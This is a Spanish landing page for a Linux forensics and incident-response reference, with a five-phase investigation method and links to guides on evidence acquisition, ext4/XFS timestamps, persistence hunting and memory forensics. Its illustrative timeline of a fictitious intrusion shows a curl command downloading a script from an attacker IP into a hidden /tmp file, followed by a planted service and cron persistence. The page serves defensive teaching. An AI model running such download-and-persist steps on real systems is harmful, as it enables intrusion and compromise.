Ir al contenido

Referencia práctica de DFIR en Linux

Investiga sistemas Linux con confianza.

Dónde está la evidencia, qué demuestra y cómo recogerla sin destruirla: registros y journal de systemd, historial de la shell, persistencia, marcas de tiempo ext4 y XFS, memoria, contenedores y triaje.

áreas de investigación
9
guías detalladas
11
términos del glosario
12
supertimeline · web-prod-03UTC
  1. 02:13:07auth.logsshd: Accepted publickey for deploy from 203.0.113.50
  2. 02:13:41bash_historycurl -s http://203.0.113.50/k.sh -o /tmp/.k
  3. 02:14:02ext4 crtime/tmp/.k born · inode 1310722
  4. 02:15:19journalsystemd: Enabled dbus-helper.service
  5. 02:15:20ext4 mtime/usr/bin/ss replaced · dpkg -V: ??5??????
  6. 02:31:55cron(root) CMD (/usr/lib/.cache/upd)
$psort.py -o l2tcsv case.plaso "date > '2026-03-14 02:00:00'"
Ejemplo ilustrativo: una intrusión ficticia reconstruida a partir de cinco fuentes de artefactos.

/var/evidence

El mapa del análisis forense en Linux

Nueve áreas cubren los artefactos que importan en un sistema Linux comprometido. Cada una enlaza con guías detalladas con comandos, tablas y trampas habituales.

método

De la primera alerta a una línea de tiempo defendible

Las mismas cinco fases sirven tanto para una VM en la nube como para una flota de servidores.

  1. 01

    Preservar

    Captura primero lo volátil: memoria, procesos, sockets. Crea instantáneas o imágenes de los discos y anota los hashes.

  2. 02

    Triaje

    Ejecuta UAC o un recolector de Velociraptor para obtener registros, historiales y configuración en minutos.

  3. 03

    Analizar

    Lee los registros de autenticación, el journal, el historial de la shell, la persistencia y el estado de los paquetes.

  4. 04

    Correlacionar

    Une evidencias del sistema de archivos, registros y memoria en una supertimeline en UTC y pivota.

  5. 05

    Informar

    Explica qué demuestra cada artefacto, qué no puede demostrar y cómo lo verificaste.

~/guides

Últimas guías

Por ahora estas guías solo están publicadas en inglés. Los enlaces siguientes abren la versión en inglés.

Ver todas las guías
01 · Adquisición y triajeInglés

Acquiring Linux Evidence: Disk Imaging and Read-Only Mounts

How to acquire Linux evidence soundly: order of volatility, live vs dead acquisition, dd/dc3dd/ewfacquire imaging, cloud snapshots and read-only mounts.

acquisitiondisk-imagingchain-of-custody
05 · Sistema de archivos y marcas de tiempoInglés

ext4 and XFS Timestamps, Inodes and Deleted Files

How to read MAC and birth timestamps on ext4 and XFS, spot timestomping through ctime, and understand the real limits of deleted file recovery on Linux.

ext4xfstimestamps
04 · PersistenciaInglés

Hunting Linux Persistence: Cron, systemd, SSH and More

Where attackers hide persistence on Linux (cron, systemd units and timers, shell startup files, SSH keys, ld.so.preload, PAM, udev, modules) and how to find it.

persistencecronsystemd
06 · Análisis forense de memoriaInglés

Linux Memory Forensics with LiME, AVML and Volatility 3

Acquire Linux RAM with LiME or AVML, build Volatility 3 symbol tables with dwarf2json, and find hidden processes, rootkit modules and bash history in memory.

memory-forensicsvolatilitylime